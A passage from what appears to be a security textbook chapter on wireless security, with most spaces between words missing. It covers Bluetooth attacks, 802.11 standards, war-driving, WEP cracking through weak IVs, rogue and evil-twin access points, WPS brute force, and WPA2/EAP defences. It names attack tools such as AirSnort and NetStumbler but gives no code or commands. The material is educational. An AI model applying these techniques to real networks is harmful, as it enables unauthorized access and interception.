transmissionprotocol.Thedifferenceisthatinsteadofsendinganunsolicitedmessagetothevictim’sphone,theattackercopiesoffthevictim’sinformation,whichcanincludee-mails,contactlists,calendar,andanythingelsethatexistsonthatdevice.Morerecentphoneswithmediacapabilitiescanbesnarfedforprivatephotosandvideos.BluesnarfingusedtorequirealaptopwithaBluetoothadapter,makingitrelativelyeasytoidentifyapossibleattacker,butbluesnarfingapplicationsarenowavailableformobiledevices.Bloover,acombinationofBluetoothandHoover,isonesuchapplicationthatrunsasaJavaapplet.ThemajorityofBluetoothphonesneedtobediscoverableforthebluesnarfattacktowork,butitdoesnotnecessarilyneedtobepaired.Intheory,anattackercanalsobrute-forcethedevice’sunique48-bitname.AprogramcalledRedFangattemptstoperformthisbrute-forceattackbysendingallpossiblenamesandseeingwhatgetsaresponse.ThisapproachwasaddressedinBluetooth1.2withananonymitymode.Bluebuggingisafarmoreseriousattackthaneitherbluejackingor
bluesnarfing.Inbluebugging,theattackerusesBluetoothtoestablishaserialconnectiontothedevice.ThisallowsaccesstothefullATcommandset—GSMphonesuseATcommandssimilartoHayes-compatiblemodems.Thisconnectionallowsfullcontroloverthephone,includingthe
placingofcallstoanynumberwithoutthephoneowner’sknowledge.Fortunately,thisattackrequirespairingofthedevicestocomplete,andphonesinitiallyvulnerabletotheattackhaveupdatedfirmwaretocorrecttheproblem.Toaccomplishtheattacknow,thephoneownerwouldneedtosurrenderherphoneandallowanattackertophysicallyestablishtheconnection.BluetoothDOSistheuseofBluetoothtechnologytoperformadenial-
of-serviceattackagainstanotherdevice.Inthisattack,anattackerrepeatedlyrequestspairingwiththevictimdevice.Thistypeofattackdoesnotdivulgeinformationorpermitaccess,butisanuisance.And,more
importantly,ifdonerepeatedlyitcandrainadevice’sbattery,orpreventotheroperationsfromoccurringonthevictim’sdevice.AswithallBluetoothattacks,becauseoftheshortrangeinvolved,allonehastodoisleavetheareaandtheattackwouldcease.Bluetoothtechnologyislikelytogrowduetothepopularityofmobile
phones.Softwareandprotocolupdateshavehelpedtoimprovethesecurityoftheprotocol.AlmostallphonesnowkeepBluetoothturnedoffbydefault,andtheyallowyoutomakethephonediscoverableforonlyalimitedamountoftime.Usereducationaboutsecurityrisksisalsoalargefactorinavoidingsecuritybreaches.
NearFieldCommunicationNearfieldcommunication(NFC)isasetofwirelesstechnologiesthatenablessmartphonesandotherdevicestoestablishradiocommunicationoverashortproximity,typicallyadistanceof10cm(3.9in)orless.Thistechnologydidnotseemuchuseuntilrecentlywhenitstartedbeingemployedtomovedatabetweencellphonesandinmobilepaymentsystems.NFCislikelytobecomeahighusetechnologyintheyearstocomeasmultipleusesexistforthetechnology,andthenextgenerationofsmartphonesissurelytoseethisasastandardfunction.
IEEE802.11SeriesThe802.11bprotocolisanIEEEstandardratifiedin1999.Thestandardlaunchedarangeofproducts(suchaswirelessrouters,anexampleofwhichisshowninFigure12.4)thatwouldopenthewaytoawholenewgenreofpossibilitiesforattackersandanewseriesofheadachesforsecurityadministratorseverywhere.802.11wasanewstandardforsendingpacketizeddatatrafficoverradiowavesintheunlicensed2.4GHzband.
•Figure12.4Acommonwirelessrouter
ThisgroupofIEEEstandardsisalsocalledWi-Fi,whichisacertificationownedbyanindustrygroup,theWi-FiAlliance.AdevicemarkedasWi-FiCertifiedadherestothestandardsofthealliance.Astheproductsmaturedandbecameeasytouseandaffordable,securityexpertsbegantodeconstructthelimitedsecuritythathadbeenbuiltintothe
standard.The802.11bstandardwasthefirsttomarket,802.11afollowed,and
802.11gproductscurrentlyarethemostcommononesbeingsold.Thesechipsetshavealsocommonlybeencombinedintodevicesthatsupporta/b/gstandards.802.11nisthelateststandard.Thistableshowsthestandardswiththeirfrequencyranges.
802.11aisthewirelessnetworkingstandardthatsupportstrafficonthe5GHzband,allowingfasterspeedsovershorterranges.Featuresof802.11band802.11awerelaterjoinedtocreate802.11g,anupdatedstandardthatallowsthefasterspeedsofthe5GHzspecificationonthe2.4GHzband.Securityproblemswerediscoveredintheimplementationsoftheseearlywirelessstandards,principallyinvolvingtheWiredEquivalent
Privacy(WEP)protocol.Theseproblemsincludedanattacker’sabilitytobreakthecryptographyandmonitorotherusers’traffic.ThesecurityproblemsinWEPwereatopconcernuntiltheadoptionof802.11i-compliantproductsenhancedthesecuritywithWi-FiProtectedAccess(WPA),discussedlaterinthechapter.802.11acisthelateststandard;itfocusesonachievingmuchhigherspeedsforwirelessnetworks.Direct-sequencespreadspectrum(DSSS)isamodulationtypethatspreadsthetrafficsentovertheentirebandwidth.Itdoesthisbyinjectinganoise-likesignalintotheinformationstreamandtransmittingthenormallynarrowbandinformationoverthewiderbandavailable.Theprimaryreasonthatspread-spectrumtechnologyisusedin802.11protocolsistoavoidinterferenceonthepublic2.4GHzand5GHzbands.Orthogonalfrequencydivisionmultiplexing(OFDM)multiplexes,orseparates,thedatatobetransmittedintosmallerchunksandthentransmitsthechunksonseveralsubchannels.Thisuseofsubchannelsiswhatthe“frequencydivision”portionofthenamerefersto.Bothofthesetechniques,multiplexingandfrequencydivision,areusedtoavoidinterference.Orthogonalreferstothemannerinwhichthesubchannelsareassigned,principallytoavoidcrosstalk,orinterferencewithyourownchannels.
802.11:IndividualStandardsThe802.11bprotocolprovidesformultiple-rateEthernetover2.4GHzspread-spectrumwireless.Itprovidestransferratesof1Mbps,2Mbps,5.5Mbps,and11MbpsandusesDSSS.Themostcommonlayoutisapoint-to-multipointenvironment,withtheavailablebandwidthbeingsharedbyallusers.Typicalrangeisroughly100yardsindoorsand300yardsoutdoors,lineofsight.Whilethewirelesstransmissionsof802.11canpenetratesomewallsandotherobjects,thebestrangeisofferedwhenboththeaccesspointandnetworkclientdeviceshaveanunobstructedviewofeachother.802.11ausesahigherbandandhashigherbandwidth.Itoperatesinthe
5GHzspectrumusingOFDM.Supportingratesofupto54Mbps,itisthe
fasterbrotherof802.11b;however,thehigherfrequencyusedby802.11ashortenstheusablerangeofthedevicesandmakesitincompatiblewith802.11b.Thechipsetstendtobemoreexpensivefor802.11a,whichhasslowedadoptionofthestandard.The802.11gstandardusesportionsofbothoftheotherstandards:it
usesthe2.4GHzbandforgreaterrangebutusestheOFDMtransmissionmethodtoachievethefaster54Mbpsdatarates.Asitusesthe2.4GHzband,thisstandardinteroperateswiththeolder802.11bstandard.Thisallowsan802.11gaccesspoint(AP)togiveaccesstoboth“G”and“B”clients.The802.11nversionimprovesontheolderstandardsbygreatly
increasingspeed.Ithasafunctionaldatarateofupto600Mbps,gainedthroughtheuseofwiderbandsandmultiple-inputmultiple-output(MIMO)processing.MIMOusesmultipleantennasandcanbondseparatechannelstogethertoincreasedatathroughput.802.11acisthelatestinthe5GHzband,withfunctionaldataratesupto
atheoretical6+Gbpsusingmultipleantennas.The802.11acstandardwasratifiedin2014,andchipsetshavebeenavailablesincelate2011.Designedformultimediastreamingandotherhigh-bandwidthoperations,theindividualchannelsaretwicethewidthof802.11nchannels,andasmanyaseightantennascanbedeployedinaMu-MIMOform.802.11proposalsdon’tstopwith“ac”though.Thereareseveralideas
thatextendthe802.11standardfornewandinterestingapplications.Forexample,802.11sisaproposedstandardforwirelessmeshnetworkswhereallnodesonthenetworkareequalinsteadofusinganaccesspointandaclient.802.11pisanotherexample;itdefinesanapplicationwheremobilevehiclescancommunicatewithothervehiclesorroadsidestationsforsafetyinformationortollcollection.Alltheseprotocolsoperateinbandsthatare“unlicensed”bytheFCC.
ThismeansthatpeopleoperatingthisequipmentdonothavetobecertifiedbytheFCC,butitalsomeansthatthedevicescouldpossiblysharethebandwithotherdevices,suchascordlessphones,closed-circuitTV(CCTV)wirelesstransceivers,andothersimilarequipment.Thisother
equipmentcancauseinterferencewiththe802.11equipment,possiblycausingspeeddegradation.
The2.4GHzbandiscommonlyusedbymanyhouseholddevicesthatareconstantlyon,suchascordlessphones.Itisalsothefrequencyusedbymicrowaveovenstoheatfood.SoifyouarehavingintermittentinterferenceonyourWi-FiLAN,checktoseeifthemicrowaveison.
The802.11protocoldesignersexpectedsomesecurityconcernsandattemptedtobuildprovisionsintothe802.11protocolthatwouldensureadequatesecurity.The802.11standardincludesattemptsatrudimentaryauthenticationandconfidentialitycontrols.Authenticationishandledinitsmostbasicformbythe802.11AP,forcingtheclientstoperformahandshakewhenattemptingto“associate”totheAP.
SSIDscanbesettoanythingbythepersonsettingupanaccesspoint.So,while“FBISurveillanceVan#14”mayseemhumorous,whataboutSSIDswiththenameoftheairportyouarein,Starbucks,orthehotelyouarein?Canyoutrustthem?Sinceanyonecanuseanyname,theanswerisno.So,ifyouneedasecureconnection,youshouldusesomeformofsecurechannelsuchasaVPNforcommunicationsecurity.Forevenmoresecurity,youcancarryyourownaccesspointandcreateawirelesschannelthatyoucontrol.
AssociationistheprocessrequiredbeforetheAPwillallowtheclienttotalkacrosstheAPtothenetwork.Associationoccursonlyiftheclienthasallthecorrectparametersneededinthehandshake,amongthemtheservicesetidentifier(SSID).ThisSSIDsettingshouldlimitaccessonlytotheauthorizedusersofthewirelessnetwork.TheSSIDisaphrase-basedmechanismthathelpsensurethatyouareconnectingtothecorrectAP.ThisSSIDphraseistransmittedinalltheaccesspoint’sbeaconframes.Thebeaconframeisan802.11managementframeforthenetworkandcontainsseveraldifferentfields,suchasthetimestampandbeaconinterval,butmostimportantlytheSSID.Thisallowsattackersto
scanforthebeaconframeandretrievetheSSID.Thedesignersofthe802.11standardalsoattemptedtomaintain
confidentialitybyintroducingWiredEquivalentPrivacy(WEP),whichusestheRC4streamciphertoencryptthedataasitistransmittedthroughtheair.WEPhasbeenshowntohaveanimplementationproblemthatcanbeexploitedtobreaksecurity.Tounderstandallthe802.11securityproblems,youmustfirstlookat
someofthereasonsitbecamesuchaprominenttechnology.Wirelessnetworkscamealongin2000andbecameverypopular.Forthefirsttime,itwaspossibletohavealmostfull-speednetworkconnectionswithouthavingtobetieddowntoanEthernetcable.Thetechnologyquicklytookoff,allowingpricestodropintotheconsumerrange.Oncethemarketshiftedtofocusoncustomerswhowerenotnecessarilytechnologists,theproductsalsobecameveryeasytoinstallandoperate.Defaultsettingsweredesignedtogetthenoviceusersupandrunningwithouthavingtoalteranythingsubstantial,andproductsweredescribedasbeingabletojustpluginandwork.Thesedevelopmentsfurtherenlargedthemarketforthelow-cost,easy-to-usewirelessaccesspoints.ThenattackersrealizedthatinsteadofattackingmachinesovertheInternet,theycoulddrivearoundandseekouttheseAPs.Typically,accesstoactualEthernetsegmentsisprotectedbyphysical
securitymeasures.Thisstructureallowssecurityadministratorstoplanforonlyinternalthreatstothenetworkandgivesthemaclearideaofthetypesandnumberofmachinesconnectedtoit.Wirelessnetworkingtakesthekeystothekingdomandtossesthemoutthewindowandintotheparkinglot.Atypicalwirelessinstallationbroadcaststhenetworkrightthroughthephysicalcontrolsthatareinplace.AnattackercandriveupandhavethesameaccessasifhepluggedintoanEthernetjackinsidethebuilding—infact,betteraccess,because802.11isasharedmedium,allowingsnifferstoviewallpacketsbeingsenttoorfromtheAPandallclients.TheseAPsarealsotypicallybehindanysecuritymeasuresthecompanieshaveinplace,suchasfirewallsandintrusiondetectionsystems(IDSs).Thiskindofaccessintotheinternalnetworkhascausedalargestiramongcomputer
securityprofessionalsandeventuallythemedia.War-driving,war-flying,war-walking,war-chalking—allofthesetermshavebeenusedinsecurityarticleaftersecurityarticletodescribeattacksonwirelessnetworks.
CrossCheckIntrusionDetectionSystemsChapter13hasalotmoreinformationaboutintrusiondetectionsystems,whereasthischapterreferencesmethodsofgettingpasttheIDSs.WhenyoulearnmoreaboutthedifferentIDSs,howwouldyoudesignanIDSthatcancatchwirelessattackers?
Attacking802.11Wirelessisapopulartargetforseveralreasons:theaccessgainedfromwireless,thelackofdefaultsecurity,andthewideproliferationofdevices.However,otherreasonsalsomakeitattackable.Thefirstoftheseisanonymity:Anattackercanprobeyourbuildingforwirelessaccessfromthestreet.ThenhecanlogpacketstoandfromtheAPwithoutgivinganyindicationthatanattemptedintrusionistakingplace.TheattackerwillannouncehispresenceonlyifheattemptstoassociatetotheAP.Eventhen,anattemptedassociationisrecordedonlybytheMACaddressofthewirelesscardassociatingtoit,andmostAPsdonothavealertingfunctionalitytoindicatewhenusersassociatetoit.Thisfactgivesadministratorsaverylimitedviewofwhoisgainingaccesstothenetwork,iftheyareevenpayingattentionatall.Itgivesattackerstheabilitytoseekoutandcompromisewirelessnetworkswithrelativeimpunity.Thesecondreasonisthelowcostoftheequipmentneeded.Asingle
wirelessaccesscardcostinglessthan$100cangiveaccesstoanyunsecuredAPwithindrivingrange.Finally,attackingawirelessnetworkisrelativelyeasycomparedtoattackingothertargethosts.Windows-basedtoolsforlocatingandsniffingwireless-basednetworkshaveturnedanyonewhocandownloadfilesfromtheInternetandhasawirelesscardintoapotentialattacker.
Locatingwirelessnetworkswasoriginallytermedwar-driving,anadaptationofthetermwar-dialing.War-dialingcomesfromthe1983movieWarGames;itistheprocessofdialingalistofphonenumberslookingformodem-connectedcomputers.War-driversdrivearoundwithawirelesslocaterprogramrecordingthenumberofnetworksfoundandtheirlocations.Thistermhasevolvedalongwithwar-flyingandwar-walking,whichmeanexactlywhatyouexpect.War-chalkingstartedwithpeopleusingchalkonsidewalkstomarksomeofthewirelessnetworkstheyfound.
Anonymityalsoworksinanotherway;onceanattackerfindsanunsecuredAPwithwirelessaccess,theycanuseanessentiallyuntraceableIPaddresstoattemptattacksonotherInternethosts.
Themostcommontoolsforanattackertousearereception-basedprogramsthatlistentothebeaconframesoutputbyotherwirelessdevices,andprogramsthatpromiscuouslycapturealltraffic.ThemostwidelyusedoftheseprogramsiscalledNetStumbler,createdbyMariusMilnerandshowninFigure12.5.ThisprogramlistensforthebeaconframesofAPsthatarewithinrangeofthecardattachedtotheNetStumblercomputer.Whenitreceivestheframes,itlogsallavailableinformationabouttheAPforlateranalysis.Sinceitlistensonlytobeaconframes,NetStumblerdisplaysonlynetworksthathavetheSSIDbroadcastturnedon.IfthecomputerhasaGPSunitattachedtoit,theprogramalsologstheAP’scoordinates.ThisinformationcanbeusedtoreturntotheAPortoplotmapsofAPsinacity.
•Figure12.5NetStumbleronaWindowsPC
NetStumblerisaWindows-basedapplication,butprogramsforotheroperatingsystemssuchasOSX,BSD,Linux,andothersworkonthesameprinciple.
ExamTip:Becausewirelessantennascantransmitoutsideafacility,thepropertuningandplacementoftheseantennascanbecrucialforsecurity.Adjustingradiatedpowerthroughthesepower-levelcontrolswillassistinkeepingwirelesssignalsfrombeingbroadcastoutsideareas
underphysicalaccesscontrol.
Onceanattackerhaslocatedanetwork,andassumingthathecannotdirectlyconnectandstartactivescanningandpenetrationofthenetwork,hewillusethebestattacktoolthereis:anetworksniffer.Thenetworksniffer,whencombinedwithawirelessnetworkcarditcansupport,isapowerfulattacktool,asthesharedmediumofawirelessnetworkexposesallpacketstointerceptionandlogging.PopularwirelesssniffersareWireshark(formerlyEthereal)andKismet.RegularsniffersusedonwiredEthernethavealsobeenupdatedtoincludesupportforwireless.SniffersarealsoimportantbecausetheyallowyoutoretrievetheMACaddressesofthenodesofthenetwork.APscanbeconfiguredtoallowaccessonlytoprespecifiedMACaddresses,andanattackerspoofingtheMACcanbypassthisfeature.Therearespecializedsniffertoolsdesignedwithasingleobjective:to
crackWiredEquivalentPrivacy(WEP)keys.Asdescribedearlier,WEPisanencryptionprotocolthat802.11usestoattempttoensureconfidentialityofwirelesscommunications.Unfortunately,ithasturnedouttohaveseveralproblems.WEP’sweaknessesarespecificallytargetedforattackbythespecializedsnifferprograms.Theyworkbyexploitingweakinitializationvectorsintheencryptionalgorithm.Toexploitthisweakness,anattackerneedsacertainnumberofciphertextpackets;oncehehascapturedenoughpackets,however,theprogramcanveryquicklydeciphertheencryptionkeybeingused.WEPCrackwasthefirstavailableprogramtousethisflawtocrackWEPkeys;however,WEPCrackdependsonadumpofactualnetworkpacketsfromanothersnifferprogram.AirSnortisastandaloneprogramthatcapturesitsownpackets;onceithascapturedenoughciphertext,itprovidestheWEPkeyofthenetwork.
TechTip
IVAttackBecauseofthesmalllengthoftheinitializationvector(IV)inWEP,theprotectionissubject
toattackovertimebyexaminingpacketsanddeterminingwhentheIV+RC4keyrepeats,enablingthedefeatoftheprotection.
Localusersofthenetworkaresusceptibletohavingtheirentiretrafficdecodedandanalyzed.Apropersitesurveyisanimportantstepinsecuringawirelessnetworktoavoidsendingcriticaldatabeyondcompanywalls.Recurringsitesurveysareimportantbecausewirelesstechnologyischeapandtypicallycomesunsecuredinitsdefaultconfiguration.IfanyoneattachesawirelessAPtoyournetwork,youwanttoknowaboutitimmediately.
TechTip
AnotherMeaningofRogueAccessPointA“rogueaccesspoint”canalsorefertoanattacker’saccesspoint,setupasamaninthemiddletocapturelogininformationfromunsuspectingusers.
Ifunauthorizedwirelessissetup,itisknownasarogueaccesspoint.Rogueaccesspointscanbesetupbywell-meaningemployeesorhiddenbyanattackerwithphysicalaccess.Anattackermightsetuparogueaccesspointiftheyhavealimitedamountofphysicalaccesstoanorganization,perhapsbysneakingintothebuildingbriefly.TheattackercanthensetupanAPonthenetworkand,byplacingitbehindtheexternalfirewallornetworkIDS(NIDS)typeofsecuritymeasures,canattachtothewirelessatalaterdateattheirleisure.Thisapproachreducestheriskofgettingcaughtbyphysicalsecuritystaff,andiftheAPisfound,itdoesnotpointdirectlybacktoanykindoftraceableaddress.Anothertypeof802.11attackisknownastheeviltwinattack.Thisis
theuseofanaccesspointownedbyanattackerthatusuallyhasbeenenhancedwithhigher-powerandhigher-gainantennastolooklikeabetterconnectiontotheusersandcomputersattachingtoit.Bygettinguserstoconnectthroughtheevilaccesspoint,attackerscanmoreeasilyanalyze
trafficandperformman-in-the-middle−typeattacks.Forsimpledenialofservice,anattackercoulduseinterferencetojamthewirelesssignal,notallowinganycomputertoconnecttotheaccesspointsuccessfully.
CrossCheckIdentifyingRogueAccessPointsInChapter8youlearnedabouthowphysicalsecuritycanimpactinformationsecurity,andhowseveraldifferentdevicescanactasawirelessbridgeandbearogueaccesspoint.Canyouthinkofsomephysicalsecuritypoliciesthatcanhelpreducetheriskofrogueaccesspoints?Whataboutsomeinformationsecuritypolicies?
802.11networkshavetwofeaturesusedprimarilyforsecurity:oneisdesignedsolelyforauthentication,andtheotherisdesignedforauthenticationandconfidentiality.Partoftheauthenticationfunction,introducedearlier,isknownastheservicesetidentifier(SSID).Thisunique32-octetidentifierisattachedtotheheaderofthepacket.TheSSIDisbroadcastbydefaultasanetworkname,butbroadcastingofthisbeaconframecanbedisabled.UserscanauthenticatetoanetworkregardlessofwhethertheSSIDisbroadcastornot,buttheydoneedtoknowtheSSIDtoconnect.ManyAPsalsouseadefaultSSID;forCiscoAPs,thisdefaultis
tsunami,whichmayindicateanAPthathasnotbeenconfiguredforanysecurity.RenamingtheSSIDanddisablingSSIDbroadcastarebothgoodideas;however,becausetheSSIDispartofeveryframe,thesemeasuresshouldnotbeconsideredadequatetosecurethenetwork.AstheSSIDis,hopefully,auniqueidentifier,onlypeoplewhoknowtheidentifierwillbeabletocompleteassociationtotheAP.WhiletheSSIDisagoodideaintheory,itissentinplaintextinthepackets,soinpracticeSSIDofferslittlesecuritysignificance—anysniffercandeterminetheSSID.ThisweaknessismagnifiedbymostAPs’defaultsettingstotransmit
beaconframes.Thebeaconframe’spurposeistoannouncethewirelessnetwork’spresenceandcapabilitiessothatWLANcardscanattemptto
associatetoit.ThiscanbedisabledinsoftwareformanyAPs,especiallythemoresophisticatedones.Fromasecurityperspective,thebeaconframeisdamagingbecauseitcontainstheSSID,andthisbeaconframeistransmittedatasetinterval(tentimespersecondbydefault).SinceadefaultAPwithoutanyothertrafficissendingoutitsSSIDinplaintexttentimesasecond,youcanseewhytheSSIDdoesnotprovidetrueauthentication.ScanningprogramssuchasNetStumblerworkbycapturingthebeaconframesandtherebytheSSIDsofallAPs.
ExamTip:MACfilteringcanbeemployedonWAPsbutcanbebypassedbyattackersobservingallowedMACaddressesandspoofingtheallowedMACaddressforthewirelesscard.
MostAPsalsohavetheabilitytolockaccessinonlytoknownMACaddresses,providingalimitedauthenticationcapability.Givensniffers’capacitytograballactiveMACaddressesonthenetwork,thiscapabilityisnotveryeffective.AnattackersimplyconfigureshiswirelesscardstoaknowngoodMACaddress.WEPencryptsthedatatravelingacrossthenetworkwithanRC4stream
cipher,attemptingtoensureconfidentiality.Thissynchronousmethodofencryptionensuressomemethodofauthentication.ThesystemdependsontheclientandtheAPhavingasharedsecretkey,ensuringthatonlyauthorizedpeoplewiththeproperkeyhaveaccesstothewirelessnetwork.WEPsupportstwokeylengths,40and104bits,thoughthesearemoretypicallyreferredtoas64and128bits,because24bitsoftheoverallkeylengthareusedfortheinitializationvector(IV).In802.11aand802.11g,manufacturershaveextendedthisto152-bitWEPkeys,againwith24bitsbeingusedfortheIV.
TechTip
WEPIsn’tEquivalentWEPshouldnotbetrustedalonetoprovideconfidentiality.IfWEPistheonlyprotocolsupportedbyyourAP,placeitoutsidethecorporatefirewallandVPNtoaddmoreprotection.
TheIVistheprimaryreasonfortheweaknessesinWEP.TheIVissentintheplaintextpartofthemessage,andbecausethetotalkeyspaceisapproximately16millionkeys,thesamekeywillbereused.Oncethekeyhasbeenrepeated,anattackerhastwociphertextsencryptedwiththesamekeystream.Thisallowstheattackertoexaminetheciphertextandretrievethekey.ThisattackcanbeimprovedbyexaminingonlypacketsthathaveweakIVs,reducingthenumberofpacketsneededtocrackthekey.UsingonlyweakIVpackets,thenumberofrequiredcapturedpacketsisreducedtoaroundfourorfivemillion,whichcantakeonlyafewhourstocaptureonafairlybusyAP.Forapointofreference,thismeansthatequipmentwithanadvertisedWEPkeyof128bitscanbecrackedinlessthanaday,whereastocrackanormal128-bitkeywouldtakeroughly2,000,000,000,000,000,000yearsonacomputerabletoattemptonetrillionkeysasecond.Asmentioned,AirSnortisamodifiedsniffingprogramthattakesadvantageofthisweaknesstoretrievetheWEPkeys.ThebiggestweaknessofWEPisthattheIVproblemexistsregardless
ofkeylength,becausetheIValwaysremainsat24bits.Afterthelimitedsecurityfunctionsofawirelessnetworkarebroken,the
networkbehavesexactlylikearegularEthernetnetworkandissubjecttotheexactsamevulnerabilities.Thehostmachinesthatareonorattachedtothewirelessnetworkareasvulnerableasiftheyandtheattackerwerephysicallyconnected.Beingonthenetworkopensupallmachinestovulnerabilityscanners,Trojanhorseprograms,virusandwormprograms,andtrafficinterceptionviasnifferprograms.Anyunpatchedvulnerabilityonanymachineaccessiblefromthewirelesssegmentisnowopentocompromise.
CurrentSecurityMethods
WEPwasdesignedtoprovidesomemeasureofconfidentialityonan802.11networksimilartowhatisfoundonawirednetwork,butthathasnotbeenthecase.Accordingly,theWi-FiAlliancedevelopedWi-FiProtectedAccess(WPA)toimproveuponWEP.The802.11istandardistheIEEEstandardforsecurityinwirelessnetworks,alsoknownasWi-FiProtectedAccess2(WPA2).Ituses802.1Xtoprovideauthentication.WPA2canuseAdvancedEncryptionStandard(AES)astheencryptionprotocol.The802.11istandardspecifiestheuseoftheTemporalKeyIntegrityProtocol(TKIP)andusesAESwiththeCounterModewithCBC-MACProtocol(infull,theCounterModewithCipherBlockChaining–MessageAuthenticationCodesProtocol,orsimplyCCMP).Thesetwoprotocolshavedifferentfunctions,buttheybothservetoenhancesecurity.TKIPworksbyusingasharedsecretcombinedwiththecard’sMAC
addresstogenerateanewkey,whichismixedwiththeIVtomakeper-packetkeysthatencryptasinglepacketusingthesameRC4cipherusedbytraditionalWEP.ThisovercomestheWEPkeyweakness,asakeyisusedononlyonepacket.Theotheradvantagetothismethodisthatitcanberetrofittedtocurrenthardwarewithonlyasoftwarechange,unlikeAESand802.1X.CCMPisactuallythemodeinwhichtheAEScipherisusedtoprovidemessageintegrity.UnlikeTKIP,CCMPrequiresnewhardwaretoperformtheAESencryption.Theadvancesof802.11ihavecorrectedtheweaknessesofWEP.
WPAThefirststandardtobeusedinthemarkettoreplaceWEPwasWi-FiProtectedAccess(WPA).ThisstandardusestheflawedWEPalgorithmwiththeTemporalKeyIntegrityProtocol(TKIP).WhileWEPusesa40-bitor104-bitencryptionkeythatmustbe
manuallyenteredonwirelessaccesspointsanddevicesanddoesnotchange,TKIPemploysaper-packetkey,generatinganew128-bitkeyforeachpacket.Thiscangenerallybeaccomplishedwithonlyafirmwareupdate,enablingasimplesolutiontothetypesofattacksthatcompromise
WEP.
TKIPTemporalKeyIntegrityProtocol(TKIP)wascreatedasastopgapsecuritymeasuretoreplacetheWEPprotocolwithoutrequiringthereplacementoflegacyhardware.ThebreakingofWEPhadleftWi-Finetworkswithoutviablelink-layersecurity,andasolutionwasrequiredforalreadydeployedhardware.TKIPworksbymixingasecretrootkeywiththeIVbeforetheRC4encryption.WPA/TKIPusesthesameunderlyingmechanismasWEP,andconsequentlyisvulnerabletoanumberofsimilarattacks.TKIPisnolongerconsideredsecureandhasbeendeprecatedwiththereleaseofWPA2.
WPA2IEEE802.11iisthestandardforsecurityinwirelessnetworksandisalsoknownasWi-FiProtectedAccess2(WPA2).Ituses802.1xtoprovideauthenticationandusestheAdvancedEncryptionStandard(AES)astheencryptionprotocol.WPA2usestheAESblockcipher,asignificantimprovementoverWEP’sandWPA’suseoftheRC4streamcipher.The802.11istandardspecifiestheuseoftheCounterModewithCBC-MACProtocol(infull,theCounterModewithCipherBlockChaining–MessageAuthenticationCodesProtocol,orsimplyCCMP).
WPSWi-FiProtectedSetup(WPS)isanetworksecuritystandardthatwascreatedtoprovideuserswithaneasymethodofconfiguringwirelessnetworks.Designedforhomenetworksandsmallbusinessnetworks,thisstandardinvolvestheuseofaneight-digitPINtoconfigurewirelessdevices.WPSconsistsofaseriesofExtensibleAuthenticationProtocol(EAP)messagesandhasbeenshowntobesusceptibletoabrute-forceattack.AsuccessfulattackcanrevealthePINandsubsequentlytheWPA/WPA2passphraseandallowunauthorizedpartiestogainaccessto
thenetwork.Currently,theonlyeffectivemitigationistodisableWPS.
SettingUpWPA2IfWPSisnotsafeforuse,howdoesonesetupWPA2?TosetupWPA2,youneedtohaveseveralparameters.Figure12.6showsthescreensforaWPA2setupinWindows7.
•Figure12.6WPA2setupoptionsinWindows7
Thefirstelementistochooseasecurityframework.Whenconfiguringanadaptertoconnecttoanexistingnetwork,youneedtomatchthechoiceofthenetwork.Whensettingupyourownnetwork,youcanchoosewhicheveroptionyouprefer.Therearemanyselections,butforsecuritypurposes,youshouldchooseWPA2-PersonalorWPA2-Enterprise.Bothoftheserequirethechoiceofanencryptiontype,eitherTKIPorAES.TKIPhasbeendeprecated,sochooseAES.Thelastelementisthechoiceofthenetworksecuritykey—thesecretthatissharedbyallusers.WPA2-Enterprise,whichisdesignedtobeusedwithan802.1xauthenticationserverthatdistributesdifferentkeystoeachuser,istypicallyusedinbusinessenvironments.
EAPExtensibleAuthenticationProtocol(EAP)isdefinedinRFC2284(obsoletedby3748).EAP-TLSreliesonTransportLayerSecurity(TLS),anattempttostandardizetheSSLstructuretopasscredentials.EAP-TTLS(theacronymstandsforEAP–TunneledTLSprotocol)isavariantoftheEAP-TLSprotocol.EAP-TTLSworksmuchthesamewayasEAP-TLS,withtheserverauthenticatingtotheclientwithacertificate,buttheprotocoltunnelstheclientsideoftheauthentication,allowingtheuseoflegacyauthenticationprotocolssuchasPasswordAuthenticationProtocol(PAP),Challenge-HandshakeAuthenticationProtocol(CHAP),MS-CHAP,orMS-CHAP-V2.
LEAPCiscodesignedaproprietaryEAPknownasLightweightExtensibleAuthenticationProtocol(LEAP);however,thisisbeingphasedoutfornewerprotocolssuchasPEAPorEAP-TLS.Susceptibletoofflinepasswordguessing,andwithtoolsavailablethatactivelybreakLEAPsecurity,thisprotocolhasbeendeprecatedinfavorofstrongermethodsof
EAP.
PEAPPEAP,orProtectedEAP,wasdevelopedtoprotecttheEAPcommunicationbyencapsulatingitwithTLS.ThisisanopenstandarddevelopedjointlybyCisco,Microsoft,andRSA.EAPwasdesignedassumingasecurecommunicationchannel.PEAPprovidesthatprotectionaspartoftheprotocolviaaTLStunnel.PEAPiswidelysupportedbyvendorsforuseoverwirelessnetworks.
Implementing802.1XTheIEEE802.1XprotocolcansupportawidevarietyofauthenticationmethodsandalsofitswellintoexistingauthenticationsystemssuchasRADIUSandLDAP.Thisallows802.1XtointeroperatewellwithothersystemssuchasVPNsanddial-upRAS.Unlikeotherauthenticationmethods,suchasthePoint-to-PointProtocoloverEthernet(PPPoE),802.1Xdoesnotuseencapsulation,sothenetworkoverheadismuchlower.Unfortunately,theprotocolisjustaframeworkforprovidingimplementation,sonospecificsguaranteestrongauthenticationorkeymanagement.Implementationsoftheprotocolvaryfromvendortovendorinmethodofimplementationandstrengthofsecurity,especiallywhenitcomestothedifficulttestofwirelesssecurity.Threecommonmethodsareusedtoimplement802.1X:EAP-TLS,
EAP-TTLS,andEAP-MD5.EAP-TLSreliesonTLS,anattempttostandardizetheSSLstructuretopasscredentials.Thestandard,developedbyMicrosoft,usesX.509certificatesandoffersdynamicWEPkeygeneration.Thismeansthattheorganizationmusthavetheabilitytosupportthepublickeyinfrastructure(PKI)intheformofX.509digitalcertificates.Also,per-user,per-sessiondynamicallygeneratedWEPkeyshelppreventanyonefromcrackingtheWEPkeysinuse,aseachuserindividuallyhasherownWEPkey.EvenifauserwereloggedontotheAPandtransmittedenoughtraffictoallowcrackingoftheWEPkey,accesswouldbegainedonlytothatuser’straffic.Nootheruser’sdata
